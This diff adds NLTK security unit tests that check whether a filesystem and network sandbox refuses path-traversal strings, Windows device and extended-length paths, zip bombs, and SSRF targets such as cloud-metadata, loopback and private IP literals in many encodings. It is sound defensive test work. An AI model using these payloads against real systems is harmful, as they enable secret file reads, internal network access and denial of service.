+        payload = b"corpus line\n" * 2000
+        with gzip.open(archive, "wb") as handle:
+            handle.write(payload)
+        with nltk.data.GzipFileSystemPathPointer(archive).open() as stream:
+            assert stream.read() == payload
+
+    def test_aggregate_bomb_refused_through_the_open_read_path(
+        self, restricted_sandbox
+    ):
+        # Many members each below the single-member floor but together over the
+        # aggregate cap: constructing or reading them through the hardened
+        # ZipFile.open().read() path must fail closed, not only through extract.
+        archive = os.path.join(str(restricted_sandbox), "aggregate.zip")
+        with zipfile.ZipFile(archive, "w", compression=zipfile.ZIP_DEFLATED) as handle:
+            for i in range(40):
+                handle.writestr(f"m{i}.bin", b"\0" * (6 * 1024 * 1024))
+        with pytest.raises(REFUSALS):
+            with pathsec.ZipFile(archive) as zf:
+                for name in zf.namelist():
+                    with zf.open(name) as stream:
+                        while stream.read(1024 * 1024):
+                            pass
+
+
+@POSIX_ONLY
+class TestBackslashAndColonAreLiteralInRootOnPosix:
+    def test_backslash_and_colon_members_are_accepted_as_in_root_literals(
+        self, restricted_sandbox
+    ):
+        # Over-block control: a backslash or a leading drive-letter colon is a
+        # legal filename character on POSIX, not a separator, so such members are
+        # literal in-root names and must NOT be refused as traversal. The Windows
+        # unsafe-member rule is proved separately with a faked altsep.
+        extract = os.path.join(str(restricted_sandbox), "ex")
+        os.makedirs(extract)
+        archive = os.path.join(str(restricted_sandbox), "literal.zip")
+        with zipfile.ZipFile(archive, "w") as handle:
+            handle.writestr("weird\\name.txt", b"x")
+            handle.writestr("C:literal.txt", b"y")
+        # No raise: these resolve to in-root literal names on POSIX.
+        pathsec.validate_zip_archive(archive, extract)

--- a/nltk/test/unit/test_attack_path_sandbox_expanded.py
+++ b/nltk/test/unit/test_attack_path_sandbox_expanded.py
@@ -1,0 +1,538 @@
+# Natural Language Toolkit: expanded path-traversal / sandbox-escape attack harness
+#
+# Copyright (C) 2001-2026 NLTK Project
+# URL: <https://www.nltk.org/>
+# For license information, see LICENSE.TXT
+
+"""Expanded attack matrix for the ``nltk.pathsec`` filesystem sandbox
+(GHSA-8mgp-746c-j5xp umbrella, #3753; CWE-22 / CWE-59 / CWE-377 / CWE-378 /
+CWE-400 / CWE-409).
+
+This file adds the path-escape vectors that the existing suites
+(``test_pathsec.py``, ``test_pathsec_io_attack_matrix.py``,
+``test_path_traversal_security.py``, ``test_corpus_reader_traversal.py``,
+``test_downloader_package_traversal.py``, the zip suites, ...) do NOT yet cover.
+It deliberately avoids duplicating them; each case here is net-new:
+
+* redundant-segment / lookalike shapes that must NOT collapse into a traversal
+  (``....//``, unicode dot lookalikes U+2024/U+2025/U+FF0E, a trailing ``foo/..``,
+  a single payload interleaving forward and back slashes);
+* the reserved-device names ``CONIN$`` / ``CONOUT$`` and the ``\\\\?\\``
+  extended-length / ``\\\\?\\UNC\\`` Windows spellings;
+* a block special file (``S_IFBLK``) at the non-regular-file guard;
+* a world-writable ANCESTOR and the staging-directory REUSE guard;
+* a single over-expanding zip member reaching the per-member read/open cutoff
+  (the aggregate and gzip bombs are covered elsewhere, this one is not);
+* benign controls the guards must still ACCEPT (a unicode filename read/write
+  round trip, a name merely *starting* like a device, the lookalike shapes as
+  literal in-root names).
+
+Every hostile vector must be REFUSED (``PermissionError`` / ``ValueError``); every
+benign in-root vector must SUCCEED, and no attack may read or write outside the
+data root (asserted against a sentinel). POSIX-only vectors (symlink / block
+device / mode bits / staging reuse) are ``skipif``-guarded; the Windows string
+rules are proved cross-platform by driving the pure ``_reject_bad_name_syntax``
+predicate under a faked ``os.name`` (the same technique
+``test_zip_member_platform_rules.py`` uses for ``os.path.altsep``), and also run
+for real on a Windows runner.
+
+Outside targets are staged under the real ``$HOME`` (never a temp dir, which is
+itself an allowed root on macOS) via the conftest ``sandbox`` / ``pathsec_sandbox``
+fixtures.
+"""
+
+import os
+import stat
+import tempfile
+import zipfile
+
+import pytest
+
+import nltk.data
+from nltk import pathsec
+from nltk.pathsec import (
+    _reject_aliased_or_special,
+    _reject_bad_name_syntax,
+    is_private_dir,
+    validate_model_resource,
+    validate_tool_dir,
+    validate_tool_path,
+)
+
+REFUSALS = (PermissionError, ValueError)
+
+POSIX_ONLY = pytest.mark.skipif(
+    os.name != "posix",
+    reason="symlink / block device / mode bits / staging reuse are POSIX vectors",
+)
+WINDOWS_ONLY = pytest.mark.skipif(
+    os.name == "posix",
+    reason="reserved device / extended-length paths are Windows vectors",
+)
+
+
+def _resolve(path):
+    return os.path.realpath(str(path))
+
+
+def _under(path, root):
+    """True if *path* resolves to *root* or strictly inside it."""
+    root_r = _resolve(root)
+    target = _resolve(path)
+    return target == root_r or target.startswith(root_r + os.sep)
+
+
+# ==========================================================================
+# 1. Redundant-segment / dot-lookalike shapes must NOT collapse to a traversal
+# ==========================================================================
+# ``....//`` and the unicode dot lookalikes are NOT ``..``: a filter that strips
+# ``../`` in a single pass would turn ``....//`` into ``../``, and a normalizer
+# that folded U+2024/U+FF0E to ``.`` would turn ``\u2024\u2024`` into ``..``.
+# NLTK does neither; it splits on the real separator and compares whole
+# components, so at the tool layer these stay LITERAL in-root names (accepted,
+# proven to resolve inside the root, never above it); at the data-resource layer
+# they are refused or not-found. Both outcomes prove the shape never becomes an
+# escape.
+
+# (id, literal spelling of the leaf/prefix that must stay in-root). These are
+# distinct unicode characters (not ASCII dots), so they are ordinary literal
+# names on every platform. The ASCII "....//" spelling is posix-only (a name of
+# all dots is degenerate on Windows, where trailing dots are stripped), so it is
+# covered by test_dotdotdotdot_stays_literal_in_root_on_posix below instead.
+_LOOKALIKE_COMPONENTS = [
+    ("one-dot-leader U+2024", "\u2024\u2024/sub"),
+    ("two-dot-leader U+2025", "\u2025/sub"),
+    ("fullwidth-full-stop U+FF0E", "\uff0e\uff0e/sub"),
+]
+
+
+class TestLookalikesStayLiteralInRoot:
+    @pytest.mark.parametrize(
+        "spelling",
+        [s for _, s in _LOOKALIKE_COMPONENTS],
+        ids=[i for i, _ in _LOOKALIKE_COMPONENTS],
+    )
+    def test_tool_dir_keeps_lookalike_inside_root(self, restricted_sandbox, spelling):
+        # Accepted as a literal name, and (the security property) its resolved
+        # location is INSIDE the root, i.e. it did not collapse into ``../``.
+        candidate = os.path.join(restricted_sandbox, spelling)
+        returned = validate_tool_dir(candidate)
+        assert _under(
+            returned, restricted_sandbox
+        ), f"lookalike {spelling!r} escaped the root: {_resolve(returned)!r}"
+
+    @pytest.mark.parametrize(
+        "spelling",
+        [s for _, s in _LOOKALIKE_COMPONENTS],
+        ids=[i for i, _ in _LOOKALIKE_COMPONENTS],
+    )
+    def test_model_resource_keeps_lookalike_inside_root(
+        self, restricted_sandbox, spelling
+    ):
+        # A real file at the lookalike name is bounded to the root, not escaped.
+        directory = os.path.join(restricted_sandbox, spelling)
+        os.makedirs(directory, exist_ok=True)
+        target = os.path.join(directory, "model.bin")
+        open(target, "w").close()
+        returned = validate_model_resource(target)
+        assert _under(returned, restricted_sandbox)
+
+    @POSIX_ONLY
+    def test_dotdotdotdot_stays_literal_in_root_on_posix(self, restricted_sandbox):
+        # On posix "...." is an ordinary four-dot directory name, so "....//sub"
+        # is a literal path kept inside the root, not a "../" traversal. On
+        # Windows a name of all dots is degenerate (trailing dots are stripped)
+        # so the guard may refuse it there; the data-layer refusal is pinned by
+        # test_dotdotdotdot_slash_is_refused_at_the_data_layer below.
+        candidate = os.path.join(restricted_sandbox, "....//sub")
+        assert _under(validate_tool_dir(candidate), restricted_sandbox)
+        directory = os.path.join(restricted_sandbox, "....//sub")
+        os.makedirs(directory, exist_ok=True)
+        target = os.path.join(directory, "model.bin")
+        open(target, "w").close()
+        assert _under(validate_model_resource(target), restricted_sandbox)
+
+
+class TestTraversalShapesRefused:
+    """Shapes that ARE a traversal (or an out-of-namespace escape) and must be
+    refused by the tool guards; net-new spellings not in the existing matrix."""
+
+    def test_trailing_dotdot_is_refused(self, restricted_sandbox):
+        # ``<root>/sub/..``: a trailing ``..`` component climbs back to <root>,
+        # the ``..`` component check refuses it regardless of where it lands.
+        with pytest.raises(REFUSALS):
+            validate_tool_path(
+                os.path.join(restricted_sandbox, "sub", ".."),
+                must_exist=False,
+            )
+
+    def test_mixed_forward_and_back_slash_traversal_is_refused(
+        self, restricted_sandbox
+    ):
+        # A single payload interleaving ``/`` and ``\\``: the ``..`` check folds
+        # ``\\`` to ``/`` first, so the backslash-hidden ``..`` is still caught.
+        with pytest.raises(REFUSALS):
+            validate_tool_path(
+                restricted_sandbox + "/..\\..\\etc/passwd",
+                must_exist=False,
+            )
+
+    def test_dotdotdotdot_slash_is_refused_at_the_data_layer(self, monkeypatch):
+        # The data-resource layer (url2pathname pipeline) is stricter than the
+        # tool layer: ``....//`` is refused outright there. Pin it so a future
+        # single-pass ``../``-stripping normalizer that turned it into ``../``
+        # would surface here.
+        import nltk.data as D
+
+        with pytest.raises((ValueError, LookupError)):
+            D.find("....//secret.txt")
+
+
+# ==========================================================================
+# 2. No crafted / lookalike name reads a sentinel above an isolated data root
+# ==========================================================================
+
+
+def test_no_lookalike_payload_reads_a_sentinel_outside_the_root():
+    """End-to-end no-leak property for the lookalike shapes: plant a secret above
+    an isolated data root and confirm no ``....//`` / unicode-dot spelling reads
+    it, whether it is refused, collapsed, or kept as an in-root literal."""
+    base = tempfile.mkdtemp(prefix=".nltk_look_", dir=os.path.expanduser("~"))
+    try:
+        dataroot = os.path.join(base, "nltk_data")
+        os.makedirs(dataroot)
+        with open(os.path.join(base, "secret.txt"), "w") as handle:
+            handle.write("TOP-SECRET-LOOKALIKE")
+
+        payloads = [
+            "....//secret.txt",
+            "....//....//secret.txt",
+            "\u2024\u2024/secret.txt",
+            "\u2025/secret.txt",
+            "\uff0e\uff0e/secret.txt",
+            "..\u2044secret.txt",  # U+2044 FRACTION SLASH, not a separator
+        ]
+        saved = list(nltk.data.path)
+        nltk.data.path.insert(0, dataroot)
+        try:
+            for payload in payloads:
+                try:
+                    pointer = nltk.data.find(payload)
+                    content = pointer.open().read()
+                except Exception:
+                    # Any refusal / not-found / decode error means no readable
+                    # file resolved; no leak.
+                    continue
+                if isinstance(content, bytes):
+                    content = content.decode("latin-1", "replace")
+                assert "TOP-SECRET" not in content, f"lookalike leak via {payload!r}"
+        finally:
+            nltk.data.path[:] = saved
+    finally:
+        import shutil
+
+        shutil.rmtree(base, ignore_errors=True)
+
+
+# ==========================================================================
+# 3. Windows reserved-device and extended-length spellings
+# ==========================================================================
+# The string rules live in the pure ``_reject_bad_name_syntax`` predicate, so they
+# can be proved on any platform by faking ``os.name`` (the predicate does no
+# filesystem I/O). The WINDOWS_ONLY variants additionally exercise the real
+# end-to-end guard on a Windows runner.
+
+
+def _syntax_verdict(value, faked_os_name):
+    """Run the pure name-syntax predicate under a faked ``os.name``.
+
+    Returns True if REFUSED, False if accepted. Restores ``os.name`` always.
+    """
+    saved = pathsec.os.name
+    pathsec.os.name = faked_os_name
+    try:
+        _reject_bad_name_syntax(value, "NLTK tool", error=PermissionError)
+        return False
+    except REFUSALS:
+        return True
+    finally:
+        pathsec.os.name = saved
+
+
+class TestWindowsDeviceAndExtendedNames:
+    @pytest.mark.parametrize("device", ["CONIN$", "CONOUT$"])
+    def test_conin_conout_are_refused_under_windows_rules(self, device):
+        # Present in pathsec._WINDOWS_DEVICE_NAMES but never exercised before.
+        assert _syntax_verdict(f"sub/{device}", "nt") is True
+        assert _syntax_verdict(f"sub/{device}.txt", "nt") is True
+
+    @pytest.mark.parametrize("device", ["CONIN$", "CONOUT$"])
+    def test_conin_conout_are_ordinary_names_on_posix(self, device):
+        # Teeth / over-block control: on POSIX these are legal filenames, so the
+        # guard must NOT refuse them (refusing everywhere would break real data).
+        assert _syntax_verdict(f"sub/{device}", "posix") is False
+
+    @pytest.mark.parametrize(
+        "spelling",
+        ["\\\\?\\C:\\Windows\\win.ini", "\\\\?\\UNC\\server\\share\\x", "//?/C:/x"],
+        ids=["ext-len-drive", "ext-len-unc", "ext-len-forward"],
+    )
+    def test_extended_length_paths_are_refused_on_every_platform(self, spelling):
+        # ``\\?\`` and ``//?/`` begin with a UNC-shaped double separator, so they
+        # are refused under BOTH platform rule sets (not merely Windows).
+        assert _syntax_verdict(spelling, "nt") is True
+        assert _syntax_verdict(spelling, "posix") is True
+
+    def test_benign_name_starting_like_a_device_is_accepted(self):
+        # ``CONtext`` merely starts like ``CON``; it is a real name, accepted on
+        # both platforms (the device check is on the whole stem, not a prefix).
+        assert _syntax_verdict("sub/CONtext.bin", "nt") is False
+        assert _syntax_verdict("sub/CONtext.bin", "posix") is False
+
+    def test_benign_windows_drive_absolute_passes_syntax(self):
+        # Over-block control: a full drive-qualified Windows path is a legal
+        # spelling (containment, not syntax, decides it), so syntax must accept it.
+        assert _syntax_verdict("C:\\models\\english.bin", "nt") is False
+
+    @WINDOWS_ONLY
+    @pytest.mark.parametrize("device", ["CONIN$", "CONOUT$"])
+    def test_conin_conout_are_refused_end_to_end_on_windows(
+        self, restricted_sandbox, device
+    ):
+        with pytest.raises(REFUSALS):
+            validate_tool_dir(os.path.join(restricted_sandbox, device))
+
+    @WINDOWS_ONLY
+    def test_extended_length_is_refused_end_to_end_on_windows(self):
+        with pytest.raises(REFUSALS):
+            validate_tool_path("\\\\?\\C:\\Windows\\win.ini")
+
+
+# ==========================================================================
+# 4. A block special file (S_IFBLK) at the non-regular-file guard
+# ==========================================================================
+
+
+def _find_block_device():
+    """An existing block-special file under /dev, or None."""
+    candidates = [
+        "/dev/disk0",  # macOS
+        "/dev/sda",
+        "/dev/vda",
+        "/dev/loop0",
+        "/dev/nvme0n1",
+    ]
+    for candidate in candidates:
+        try:
+            if stat.S_ISBLK(os.stat(candidate).st_mode):
+                return candidate
+        except OSError:
+            continue
+    try:
+        for name in os.listdir("/dev"):
+            path = os.path.join("/dev", name)
+            try:
+                if stat.S_ISBLK(os.lstat(path).st_mode):
+                    return path
+            except OSError:
+                continue
+    except OSError:
+        pass
+    return None
+
+
+@POSIX_ONLY
+class TestBlockDeviceRefused:
+    def test_block_device_is_not_a_regular_file_or_directory(self):
+        # Only char devices (/dev/null) were exercised before. A block device
+        # must hit the same non-regular-file refusal (reading it could block or
+        # stream unbounded data, CWE-400).
+        device = _find_block_device()
+        if device is None:
+            pytest.skip("no block device available on this host")
+        with pytest.raises(PermissionError):
+            _reject_aliased_or_special(device, "NLTK tool")
+
+    def test_a_regular_file_passes_the_same_guard(self, restricted_sandbox):
+        # Over-block control: the guard must accept an ordinary file.
+        target = os.path.join(restricted_sandbox, "plain.bin")
+        open(target, "w").close()
+        _reject_aliased_or_special(target, "NLTK tool")  # must not raise
+
+
+# ==========================================================================
+# 5. World-writable ANCESTOR and the staging-directory REUSE guard
+# ==========================================================================
+
+
+@POSIX_ONLY
+class TestWorldWritableAncestorAndStagingReuse:
+    def test_is_private_dir_rejects_group_and_world_writable(self, restricted_sandbox):
+        # The primitive behind "do not reuse a squattable directory". Existing
+        # tests cover the system-temp path; here it is a data-root subdir.
+        world = os.path.join(restricted_sandbox, "world")
+        os.makedirs(world)
+        os.chmod(world, 0o777)
+        assert is_private_dir(world) is False
+        group = os.path.join(restricted_sandbox, "group")
+        os.makedirs(group)
+        os.chmod(group, 0o770)
+        assert is_private_dir(group) is False
+        private = os.path.join(restricted_sandbox, "private")
+        os.makedirs(private)
+        os.chmod(private, 0o700)
+        assert is_private_dir(private) is True  # teeth: 0700 is trusted
+
+    def test_staging_reuse_discards_a_dir_that_became_world_writable(
+        self, restricted_sandbox
+    ):
+        # A cached staging dir that has since turned world-writable is a squat
+        # target (CWE-377/378); the re-check must discard it. This is the
+        # "world-writable ancestor reuse" scenario.
+        staging = os.path.join(restricted_sandbox, "staging")
+        os.makedirs(staging, mode=0o700)
+        assert nltk.data._staging_dir_is_still_safe(staging) is True
+        os.chmod(staging, 0o777)
+        assert nltk.data._staging_dir_is_still_safe(staging) is False
+
+    def test_staging_reuse_discards_a_symlink_swapped_in_its_place(
+        self, restricted_sandbox
+    ):
+        # os.path.isdir would FOLLOW a swapped symlink; the lstat-based re-check
+        # must reject it so later scratch files do not land where the link points.
+        staging = os.path.join(restricted_sandbox, "swap")
+        os.makedirs(staging, mode=0o700)
+        real = os.path.join(restricted_sandbox, "elsewhere")
+        os.makedirs(real)
+        os.rmdir(staging)
+        os.symlink(real, staging)
+        assert nltk.data._staging_dir_is_still_safe(staging) is False
+
+    def test_benign_write_under_a_world_writable_ancestor_stays_in_root(
+        self, pathsec_sandbox
+    ):
+        # A world-writable ANCESTOR does not by itself statically escape the root
+        # (the runtime defense is the O_NOFOLLOW open, exercised elsewhere): a
+        # benign write beneath it must still land INSIDE the root and never leak
+        # to the outside sentinel.
+        root, outside = pathsec_sandbox
+        sentinel = outside / "SENTINEL"
+        sentinel.write_text("UNCHANGED")
+        ancestor = root / "wwanc"
+        ancestor.mkdir()
+        os.chmod(ancestor, 0o777)
+        target = ancestor / "child" / "model.json"
+        target.parent.mkdir()
+        with pathsec.open(str(target), "w", required_root=str(root)) as handle:
+            handle.write("PAYLOAD")
+        assert _under(str(target), str(root))
+        assert target.read_text() == "PAYLOAD"
+        assert sentinel.read_text() == "UNCHANGED", "write leaked outside the root"
+
+
+# ==========================================================================
+# 6. A single over-expanding zip member reaches the per-member read/open cutoff
+# ==========================================================================
+# The aggregate (`_check_zip_total_size`), central-directory (`_check_zip_member_count`)
+# and gzip bombs are covered elsewhere. A SINGLE-member archive skips the
+# aggregate guard at construction, so it isolates the per-member read/open cutoff
+# on ``pathsec.ZipFile.read`` / ``.open``; the path no in-scope test exercised.
+
+
+def _single_member_bomb(root, name="bomb.zip"):
+    archive = os.path.join(str(root), name)
+    with zipfile.ZipFile(archive, "w", compression=zipfile.ZIP_DEFLATED) as handle:
+        handle.writestr("bomb.bin", b"\0" * (64 * 1024 * 1024))
+    return archive
+
+
+class TestSingleZipMemberBomb:
+    def test_single_member_bomb_construction_passes_but_read_is_refused(
+        self, restricted_sandbox
+    ):
+        archive = _single_member_bomb(restricted_sandbox)
+        # A single file member skips the aggregate total-size guard, so the
+        # ZipFile constructs fine; the refusal must come from the per-member read.
+        with pathsec.ZipFile(archive) as handle, pytest.raises(REFUSALS):
+            handle.read("bomb.bin")
+
+    def test_single_member_bomb_open_stream_is_refused(self, restricted_sandbox):
+        archive = _single_member_bomb(restricted_sandbox, "bomb2.zip")
+        with pathsec.ZipFile(archive) as handle, pytest.raises(REFUSALS):
+            with handle.open("bomb.bin") as stream:
+                stream.read()
+
+    def test_benign_member_still_reads(self, restricted_sandbox):
+        # Over-block control: a small member reads through both entry points.
+        archive = os.path.join(restricted_sandbox, "good.zip")
+        with zipfile.ZipFile(archive, "w", compression=zipfile.ZIP_DEFLATED) as handle:
+            handle.writestr("hello.txt", b"hello world")
+        with pathsec.ZipFile(archive) as handle:
+            assert handle.read("hello.txt") == b"hello world"
+            with handle.open("hello.txt") as stream:
+                assert stream.read() == b"hello world"
+
+    def test_teeth_raising_the_ratio_lets_the_bomb_through(
+        self, restricted_sandbox, monkeypatch
+    ):
+        # Prove the refusal is the ratio guard and nothing incidental: raise
+        # MAX_UNZIP_RATIO above the member's expansion and the same read now
+        # succeeds (the escape reaches the sink when the guard is relaxed).
+        archive = _single_member_bomb(restricted_sandbox, "teeth.zip")
+        monkeypatch.setattr(nltk.data, "MAX_UNZIP_RATIO", 10_000_000)
+        with pathsec.ZipFile(archive) as handle:
+            data = handle.read("bomb.bin")
+        assert len(data) == 64 * 1024 * 1024
+
+
+# ==========================================================================
+# 7. Benign controls the guards must still ACCEPT
+# ==========================================================================
+
+
+class TestBenignUnicodeInRoot:
+    def test_unicode_filename_read_write_roundtrip(self, restricted_sandbox):
+        # A unicode filename inside the root must read and write through the
+        # hardened opener and the tool guard (unicode only appeared in the
+        # refused collision tests before, never as an accepted name).
+        target = os.path.join(restricted_sandbox, "café_模型_naïve.bin")
+        with pathsec.open(target, "w", required_root=restricted_sandbox) as handle:
+            handle.write("ok")
+        assert (
+            pathsec.open(target, "r", required_root=restricted_sandbox).read() == "ok"
+        )
+        assert validate_tool_path(target) == target
+
+    def test_unicode_directory_is_accepted_by_the_dir_guard(self, restricted_sandbox):
+        directory = os.path.join(restricted_sandbox, "corpus_ελληνικά")
+        os.makedirs(directory)
+        assert validate_tool_dir(directory)
+
+    def test_encoded_literal_stays_a_bare_resource_name(self):
+        # A percent-encoded name is NOT decoded by the tool layer, so it is
+        # handed back as a literal jar-resource name (never a separator).
+        assert validate_model_resource("%2e%2e%2fmodel.bin") == "%2e%2e%2fmodel.bin"
+
+
+# ==========================================================================
+# 8. ENFORCE on/off teeth for a containment refusal (net-new spelling)
+# ==========================================================================
+
+
+class TestEnforceTeeth:
+    def test_outside_unicode_file_refused_under_enforce_reached_when_off(
+        self, sandbox, monkeypatch
+    ):
+        # An out-of-root regular file with a unicode name: under ENFORCE the tool
+        # guard refuses it; with ENFORCE off the containment check no longer
+        # raises (the guard has teeth; the refusal is real, not incidental).
+        outside_file = os.path.join(str(sandbox), "naïve_secret.bin")
+        open(outside_file, "w").close()
+        with pytest.raises(REFUSALS):
+            validate_tool_path(outside_file)
+        # Turn enforcement off and confirm the same call no longer refuses.
+        monkeypatch.setattr(pathsec, "ENFORCE", False)
+        monkeypatch.setattr(pathsec, "_ALLOWED_ROOTS_CACHE", None, raising=False)
+        monkeypatch.setattr(pathsec, "_LAST_DATA_PATHS", None, raising=False)
+        # validate_tool_path returns the checked string (no raise) under ENFORCE off.
+        assert validate_tool_path(outside_file) == outside_file

--- a/nltk/test/unit/test_attack_ssrf_expanded.py
+++ b/nltk/test/unit/test_attack_ssrf_expanded.py
@@ -672,3 +672,122 @@ def test_internal_numeric_targets_refused_on_windows_path(
     monkeypatch.setattr(pathsec, "_resolve_hostname", lambda h: [])
     assert _verdict(url) == "blocked", f"{url} leaked past the numeric guard"
     assert no_real_egress == [], f"{url} produced egress"
+
+
+# =========================================================================== #
+# 16. The proxy avenue does not let the IP-literal check be bypassed, and the
+#     literal check is not weakened by opting into proxied fetches
+# =========================================================================== #
+
+# A configured proxy performs the egress, so a proxied fetch NLTK cannot pin is
+# refused by the proxy guard (GHSA-6ww7). Independently, the resolver-independent
+# IP-literal / numeric address check runs first, so an internal target is refused
+# by that check even when a proxy is configured, AND even when the operator opts
+# into proxied fetches (ALLOW_PROXIED_FETCH): the opt-in only permits a proxied
+# fetch of a target that passes the address check, never an internal literal.
+_PROXY_INTERNAL_TARGETS = [
+    "http://169.254.169.254/latest/meta-data/",  # cloud metadata literal
+    "http://127.0.0.1/admin",  # loopback literal
+    "http://[::1]/x",  # IPv6 loopback literal
+    "http://[::ffff:127.0.0.1]/x",  # IPv4-mapped loopback literal
+    "http://2130706433/",  # decimal loopback
+    "http://0x7f000001/",  # hex loopback
+    "http://10.0.0.1/internal",  # private literal
+]
+_PROXY_PUBLIC_TARGETS = ["http://1.1.1.1/", "http://93.184.216.34/"]
+
+
+def _configure_proxy(monkeypatch, allow):
+    monkeypatch.setattr(
+        urllib.request,
+        "getproxies",
+        lambda: {"http": "http://proxy.local:8080", "https": "http://proxy.local:8080"},
+    )
+    monkeypatch.setattr(urllib.request, "proxy_bypass", lambda host: False)
+    monkeypatch.setattr(urllib.request, "_opener", None)
+    monkeypatch.setattr(pathsec, "ALLOW_PROXIED_FETCH", allow)
+
+
+def _proxy_verdict(url):
+    """Which guard refuses ``pathsec.urlopen(url)`` under a configured proxy."""
+    try:
+        pathsec.urlopen(url, timeout=1)
+        return "allowed"
+    except PermissionError as exc:
+        return "proxy-guard" if "proxied fetch" in str(exc) else "address-guard"
+    except (ValueError, OSError):
+        return "address-guard"
+    except Exception:
+        return "reached-egress"
+
+
+@pytest.mark.parametrize("url", _PROXY_INTERNAL_TARGETS)
+def test_proxied_internal_target_refused_by_address_guard(
+    url, monkeypatch, no_real_egress
+):
+    _configure_proxy(monkeypatch, allow=False)
+    assert _proxy_verdict(url) == "address-guard", f"{url} was not address-refused"
+    assert no_real_egress == [], f"{url} produced egress"
+
+
+@pytest.mark.parametrize("url", _PROXY_INTERNAL_TARGETS)
+def test_proxied_internal_literal_still_refused_when_proxied_fetch_opted_in(
+    url, monkeypatch, no_real_egress
+):
+    # The operator trusts the proxy (ALLOW_PROXIED_FETCH); the address check must
+    # STILL refuse an internal literal/numeric target before the proxy carries it.
+    _configure_proxy(monkeypatch, allow=True)
+    assert _proxy_verdict(url) == "address-guard", f"{url} leaked through opt-in"
+    assert no_real_egress == [], f"{url} produced egress"
+
+
+@pytest.mark.parametrize("url", _PROXY_PUBLIC_TARGETS)
+def test_proxied_public_target_refused_by_proxy_guard(url, monkeypatch, no_real_egress):
+    # A public target passes the address check, so the proxy guard is the one that
+    # must refuse it (unpinnable through a proxy). Over-block control for section.
+    _configure_proxy(monkeypatch, allow=False)
+    assert _proxy_verdict(url) == "proxy-guard", f"{url} was not proxy-refused"
+    assert no_real_egress == [], f"{url} produced egress"
+
+
+# =========================================================================== #
+# 17. IP-literal edge spellings the direct classifier must still fold and refuse
+# =========================================================================== #
+
+# ``ipaddress.ip_address`` folds full-form, zero-padded, mixed-case, compressed,
+# zone-scoped and NAT64 dotted-quad spellings to the same address, so none can
+# smuggle an internal target past the resolver-independent literal check.
+_IP_LITERAL_EDGE_URLS = [
+    "http://[0:0:0:0:0:0:0:1]/",  # full-form loopback
+    "http://[0000:0000:0000:0000:0000:0000:0000:0001]/",  # zero-padded loopback
+    "http://[::FFFF:127.0.0.1]/",  # mixed-case IPv4-mapped loopback
+    "http://[::ffff:7f00:0001]/",  # IPv4-mapped loopback, hex tail
+    "http://[::1]:8080/",  # IPv6 loopback with an explicit port
+    "http://[fe80::1%25eth0]/",  # link-local with a URL-encoded zone id
+    "http://[64:ff9b::127.0.0.1]/",  # NAT64 with a dotted-quad loopback suffix
+    "http://[64:ff9b:0:0:0:0:7f00:1]/",  # NAT64 full-form loopback
+    "http://[2002:7f00:1::]/",  # 6to4 loopback, compressed
+    "http://[0::0]/",  # unspecified, compressed
+    "http://[::ffff:a9fe:a9fe]/",  # IPv4-mapped cloud metadata, hex
+    "http://[fc00::1]/",  # unique-local fc00::/8
+    "http://[ff02::fb]/",  # link-local mDNS multicast
+]
+
+
+@pytest.mark.parametrize("url", _IP_LITERAL_EDGE_URLS)
+def test_ip_literal_edge_spellings_refused(url, monkeypatch, no_real_egress):
+    monkeypatch.setattr(pathsec, "_resolve_hostname", lambda h: [])
+    assert _verdict(url) == "blocked", f"{url} bypassed the literal classifier"
+    assert no_real_egress == [], f"{url} produced egress"
+
+
+@pytest.mark.parametrize(
+    "url",
+    [
+        "http://[2606:4700:4700::1111]/",  # public IPv6 literal (Cloudflare)
+        "http://[2001:4860:4860::8888]/",  # public IPv6 literal (Google)
+    ],
+)
+def test_public_ip_literal_edge_spellings_allowed(url, monkeypatch):
+    monkeypatch.setattr(pathsec, "_resolve_hostname", lambda h: [])
+    assert _verdict(url) == "allowed", f"{url} was wrongly blocked"

--- a/nltk/test/unit/test_attack_ssrf_expanded.py
+++ b/nltk/test/unit/test_attack_ssrf_expanded.py
@@ -450,6 +450,10 @@ def _force_proxied(monkeypatch, no_bypass_for=None):
     monkeypatch.setattr(urllib.request, "_opener", None)
     monkeypatch.setattr(pathsec, "_resolve_hostname", lambda h: [])
     monkeypatch.setattr(pathsec, "_numeric_ipv4", lambda h: None)
+    # Neuter the address classifier too: it now also backs the resolver-
+    # independent IP-literal check, and an IP-literal target would otherwise be
+    # refused there first, before the proxy guard under test.
+    monkeypatch.setattr(pathsec, "_ip_is_forbidden", lambda ip: False)
     monkeypatch.setattr(pathsec, "ALLOW_PROXIED_FETCH", False)
     proxies = {"http": "http://proxy.local:3128", "https": "http://proxy.local:3128"}
     if no_bypass_for is not None:
@@ -536,3 +540,135 @@ def test_live_public_hostname_allowed():
     except (OSError, socket.gaierror):
         pytest.skip("no network / DNS available for the live benign control")
     assert _verdict(f"https://{host}/nltk/nltk_data/gh-pages/index.xml") == "allowed"
+
+
+# =========================================================================== #
+# 13. IPv6 wrappers / tunnels wrapping an internal IPv4, and plain internal
+#     IPv6, asserted at the classification layer (platform-independent)
+# =========================================================================== #
+
+# Each wrapper (NAT64 64:ff9b::/96, 6to4 2002::/16, Teredo 2001:0::/32, the
+# IPv4-mapped ::ffff:0:0/96 and IPv4-compatible ::/96 prefixes) can smuggle a
+# forbidden internal IPv4 past a naive is_global check on the wrapper. 6to4 and
+# Teredo are refused outright regardless of the embedded address because their
+# is_global classification varies across CPython patch levels.
+_INTERNAL_IPV6_LITERALS = [
+    "64:ff9b::7f00:1",  # NAT64 wrapping 127.0.0.1
+    "64:ff9b::a9fe:a9fe",  # NAT64 wrapping 169.254.169.254 (cloud metadata)
+    "64:ff9b::a00:1",  # NAT64 wrapping 10.0.0.1
+    "64:ff9b::6440:1",  # NAT64 wrapping 100.64.0.1 (CGNAT)
+    "2002:7f00:0001::",  # 6to4 wrapping 127.0.0.1
+    "2002:a9fe:a9fe::",  # 6to4 wrapping 169.254.169.254
+    "2002:0a00:0001::",  # 6to4 wrapping 10.0.0.1
+    "2002:0808:0808::",  # 6to4 wrapping public 8.8.8.8 (over-block)
+    "2001:0:808:808:0:0:80ff:fffe",  # Teredo folding to loopback client
+    "::ffff:127.0.0.1",  # IPv4-mapped loopback
+    "::ffff:7f00:1",  # IPv4-mapped loopback, hex tail
+    "::ffff:169.254.169.254",  # IPv4-mapped cloud metadata
+    "::ffff:10.0.0.1",  # IPv4-mapped private
+    "::127.0.0.1",  # IPv4-compatible loopback
+    "::169.254.169.254",  # IPv4-compatible cloud metadata
+    "::1",  # IPv6 loopback
+    "::",  # IPv6 unspecified
+    "fe80::1",  # IPv6 link-local
+    "fd00::1",  # IPv6 unique-local (private)
